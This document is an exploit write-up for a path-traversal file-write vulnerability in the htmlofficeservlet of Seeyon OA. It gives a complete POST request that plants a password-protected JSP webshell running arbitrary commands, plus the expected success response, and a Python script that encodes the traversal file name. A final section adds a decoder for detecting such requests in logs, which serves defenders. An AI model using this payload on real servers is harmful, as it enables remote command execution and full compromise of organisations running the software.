Seeyon OA htmlofficeservlet arbitrary file write vulnerability


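0x00 Affected versions:

  • Seeyon A8-V5 collaborative management software V6.1sp1
  • Seeyon A8+ collaborative management software V7.0, V7.0sp1, V7.0sp2, V7.0sp3
  • Seeyon A8+ collaborative management software V7.1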

0x01 Checking whether the vulnerability exists:

Request /seeyon/htmlofficeservlet
Response shown:
DBSTEP V3.0 0 21 0 htmoffice operate err

0x02 EXP

POST /seeyon/htmlofficeservlet HTTP/1.1
Content-Length: 1121
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: xxxxxxxxx
Pragma: no-cache

DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce

Successful response:

DBSTEP V3.0     386             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
CLIENTIP=wLCXqUKAP7uhw4g5zi=6
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("asasd3344".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");}else{out.println(":-)");}%>

0x03 Script for encoding and decoding the upload file name

#!/usr/bin/env python2
# -*- coding: utf-8 -*-

# qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
# ..\\..\\..\\ApacheJetspeed\\webapps\\seeyon\\test123456.jsp
import base64

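# a is the standard Base64 alphabet; b is the substituted alphabet used for the field values
a = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
b = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6"
out = ""

# Menu: 1 = encode, 2 = decode, 0 = quit
c = input("\n1.加密  2.解密  0.退出\n\n請選擇處理方式:")

while c != 0:
    out = ""
    if c == 1:
        s = raw_input("\n請輸入要處理的字符串:")
        # Base64-encode, then substitute each character from alphabet a to alphabet b
        s = base64.b64encode(s)
        for i in s:
            out += b[a.index(i)]
        print("\n處理結果為:"+out)
    elif c == 2:
        s = raw_input("\n請輸入要處理的字符串:")
        # Substitute each character from alphabet b back to alphabet a, then Base64-decode
        for i in s:
            out += a[b.index(i)]
        out = base64.b64decode(out)
        print("\n處理結果為:"+out)
    else:
        print("\n輸入有誤!!只能輸入“1”和“2”,請重試!")
    c = input("\n1.加密  2.解密  0.退出\n\n請選擇處理方式:")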

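Changing the webshell content also requires changing the 355 and 666 parameters:
355 is the position from which the source is read, and 666 is the length of the webshell source that is written.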
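
For reviewing captured request bodies or WAF logs, the field encoding above can be reversed to see which path a request to /seeyon/htmlofficeservlet asked the server to write. The Python 3 code below is an added example, not part of the original post or of the vendor's code; it only decodes, and the names decode_field, parse_dbstep and findings are hypothetical. SAMPLE is constructed from the header and field values shown on this page, with the file content replaced by a placeholder.

```python
import base64
import re

# Alphabets from the page's script: STD is standard Base64, CUSTOM is the substituted one.
STD = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
CUSTOM = "gx74KW1roM9qwzPFVOBLSlYaeyncdNbI=JfUCQRHtj2+Z05vshXi3GAEuT/m8Dpk6"
TO_STD = str.maketrans(CUSTOM, STD)
FIELD = re.compile(r"(\w+)=(\S+)")

def decode_field(value):
    """Map a field value back to standard Base64 and decode it (None if invalid)."""
    try:
        return base64.b64decode(value.translate(TO_STD), validate=True).decode("utf-8", "replace")
    except ValueError:
        return None

def parse_dbstep(body):
    """Return (header numbers, decoded fields) for a DBSTEP V3.0 body, else None."""
    lines = body.splitlines()
    head = lines[0].split() if lines else []
    if head[:2] != ["DBSTEP", "V3.0"]:
        return None
    # Per the page's note, the first number is the read offset, the third the content length.
    numbers = [int(t) for t in head[2:5] if t.isdigit()]
    fields = {}
    for token in head[5:] + lines[1:]:
        m = FIELD.fullmatch(token.strip())
        plain = decode_field(m.group(2)) if m else None
        if plain is not None:
            fields[m.group(1)] = plain
    return numbers, fields

def findings(body):
    """Reasons a request body looks like a traversal write of a JSP file."""
    parsed = parse_dbstep(body)
    name = parsed[1].get("FILENAME", "") if parsed else ""
    out = []
    if ".." in re.split(r"[\\/]", name):
        out.append("FILENAME leaves the upload directory: " + name)
    if name.lower().endswith((".jsp", ".jspx")):
        out.append("FILENAME has a server-executable extension")
    return out

# Constructed sample: header and field values copied from this page, content replaced.
SAMPLE = ("DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV\r\n"
          "OPTION=S3WYOSWLBSGr\r\n"
          "FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6\r\n"
          "<file content placeholder>")

if __name__ == "__main__":
    print("\n".join(findings(SAMPLE)))
```

Any POST to this servlet whose decoded FILENAME contains a parent-directory component or ends in .jsp is worth alerting on, and the decoded path tells responders where to look for the written file.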

